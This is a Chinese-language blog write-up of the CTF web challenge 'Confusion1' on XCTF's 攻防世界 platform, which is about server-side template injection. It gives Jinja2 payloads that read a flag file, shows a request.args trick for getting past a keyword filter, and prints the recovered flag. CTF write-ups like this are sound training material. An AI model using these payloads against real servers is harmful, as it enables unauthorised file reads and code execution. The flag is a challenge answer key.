【愚公系列】2023年05月 攻防世界-Web(Confusion1)

最新推荐文章于 2024-07-24 11:52:50 发布
最新推荐文章于 2024-07-24 11:52:50 发布
阅读量7.8k 收藏 1
点赞数
分类专栏: # CTF-攻防世界-WEB 文章标签: 前端 系统安全 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aa2528877987/article/details/130900760
版权

文章目录

前言

SSTI漏洞(Server Side Template Injection,服务端模板注入漏洞)是一种 web 应用程序中的安全漏洞,它允许攻击者通过在模板中注入恶意代码,执行服务器端的任意代码。模板通常用于 web 应用程序中的动态内容生成,这些模板经常包含逻辑控制语句和变量插入。攻击者可以利用模板中缺乏输入验证和过滤来注入任意的代码,从而实现任意代码执行,甚至是远程命令执行。SSTI漏洞是一种危险性较高的漏洞,因为攻击者可以完全控制服务器端执行的代码和结果。

一、Confusion1

1.题目

在这里插入图片描述

2.答题

在这里插入图片描述
login.php中Ctrl+U查看页面源码发现flag路径

在这里插入图片描述
login.php{{1+3}}测试ssti漏洞
在这里插入图片描述
SSTI常用的注入

__class__() 返回对象的类
__base__()/__mro__() 返回类所继承的基类
__subclasses__() 返回继承类的所有子类

测试pyaload:

{{"".__class__.__mro__[2].__subclasses__()[40]("/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt").read()}}

在这里插入图片描述
发现被过滤了

参数替换payload:

{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?&a=__class__&b=__mro__&c=__subclasses__&d=read

在这里插入图片描述
得到flag:cyberpeace{8542f410d961a14be7aa7778e0f366a4}

愚公搬代码
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
愚公学堂-时间管理-crx插件
04-04
愚公学堂-时间管理-crx插件】是一款专为中文用户设计的高效时间管理工具,旨在帮助用户更好地规划和追踪他们的日常任务和目标。这款插件采用了CRX格式,这是一种用于Chrome浏览器扩展程序的打包格式,使得用户可以...
攻防世界-Confusion1
m0_49025459的博客
02-14 634
访问题目场景某天,Bob说:PHP是最好的语言,但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候,我发现其存在问题。(请不要使用扫描器)然后结合图片我们知道,这个网址是python写的,那python语言书写的网址,存在最多的大概率是SSTI模板注入。
攻防世界--Confusion1
m0_67467924的博客
05-30 311
a=__class__&b=__mro__&c=__subclasses__查找可以使用的基类,使用base报错,但是mro可以,我不懂,先做着吧{{''[request.args.a][request.args.b]}}?
SSTI 攻防世界 Confusion1
最新发布
weixin_73399382的博客
07-24 849
具体来说,__class__是一个内置属性,表示一个对象所属的类。即""[request.args.__class__]和"".__class__效果是一样的,但是因为在语句中过滤了基础类,我们可以采取变量赋值的方式绕过限制。解析:"".__class__.__mro__[2].__subclasses__()方法返回的是可用类(classes),而不是对象(objects)。综上所述,"".__class__.__mro__[2].__subclasses__()方法返回的是可用类(classes)。
攻防世界----confusion1
qq_44418229的博客
07-22 1224
攻防世界----confusion1 如何确定是SSTI漏洞; 确定后要怎么绕过
攻防世界WEB】难度四星12分进阶题:Confusion1
07-23 745
攻防世界WEB】四星12分
XCTF相关题解Confusion1,easyphp文件包含,lottery,ics-05,easytornado(框架)
qq_62097048的博客
11-20 899
做的相关题目,也查阅了相关的wp,希望对新手有帮助
ali愚公项目配置说明
08-23
### ali愚公项目配置说明 #### 一、项目概述 阿里愚公项目(Yugong)是一款由阿里巴巴集团开发的数据迁移工具,旨在帮助用户轻松地完成数据库之间的数据迁移任务。该工具支持Oracle到MySQL等多种数据库之间的迁移,...
20XX学习新愚公精神心得体会.docx
01-23
20XX学习新愚公精神心得体会.docx
2021研学旅行系列王屋镇愚公学校研学旅行活动总结.doc
08-08
在整个研学过程中,同学们自觉遵守纪律、注意安全、文明有礼、活动有序、爱护环境、团结友爱,充分体现了愚公学校的良好校风。 此外,本文还描述了女性的四季美丽。女人的美丽就像春天的桃花,夏日的荷花,秋天的...
AstroCanvas-智慧充电桩-1-0-1684230939576.rar
07-04
物联网(Internet of Things,IoT)是近来科技领域的重要发展方向,它将物理世界与数字世界深度融合,使得设备间能实现智能化的交互与通信。"AstroCanvas-智慧充电桩-1-0-1684230939576.rar"这一文件名揭示了我们...
攻防世界Confusion1
wangzhemvp的博客
04-09 559
request 是 Flask 框架的一个全局对象 , 表示 " 当前请求的对象( flask.request ) "。所以我们可以利用request.args绕过输入黑名单,进行沙箱逃逸。php的标志是大象,Python的标志是蛇。Python 的 Flask 框架( Flask 使用 Jinja2 作为模板引擎 )输入 {{config}} 也有回显,ssti。过滤了关键字,并未过滤request。点进register.php。
攻防世界writeup
飞鱼的企鹅的博客
01-04 839
攻防世界 confusion1 第一次接触这样的漏洞,认真学习了一波 0x00题目介绍 打开是一个网站,有登陆注册功能,正中间还有一张图片(后来才知道代表php vs python) 但是点击登陆注册都显示404,就很迷了,之后又去扫描了网站,并没有发现什么有用的东西 偶然间查看页面源代码,发现了端倪 这个404界面暗藏玄机啊!但还是不知道怎么做这道题 0xo1查阅资料 其实就是查看wp…...
攻防世界-web-Confusion1
wuh2333的博客
11-22 193
攻防世界web,SSTI
攻防世界Confusion1
qq_45955869的博客
06-08 32
攻防世界Confusion1考察模板注入payload的其他构造方法。
网络安全 | XCTF】Confusion1
等风来
12-29 1669
该题考察SSTI注入。题目描述: 某天,Bob说:PHP是最好的语言,但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候,我发现其存在问题。(请不要使用扫描器)
攻防世界题目练习——Web引导模式(五)(持续更新)
qq_48550824的博客
12-12 331
果然在源码里看到里提示,应该是指出flag在/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt文件里,所以要想办法能查看到该文件,根据参考博客,这里应该是考察模板注入,但是我已经忘记了,去看看之前做的题复习一下=_=这个题文件后缀不能直接用php或者pHp,会提示说这是一个php文件,但是又需要后缀能够被识别为php文件,也就是要用不那么明显的php后缀但又必须能为识别为php的后缀。",也就是想要的不只是图片,可能要在文件后缀上试试改为php相关的。
Confusion matrix
04-01
A confusion matrix is a table used to evaluate the performance of a classification model. It summarizes the predicted and actual classifications of a dataset and provides a breakdown of the number of true positives, true negatives, false positives, and false negatives. The matrix is often used to calculate metrics such as accuracy, precision, recall, and F1 score, which help determine the model's effectiveness. The confusion matrix is a useful tool for analyzing the performance of various machine learning algorithms and making decisions about model improvements.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

愚公搬代码

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值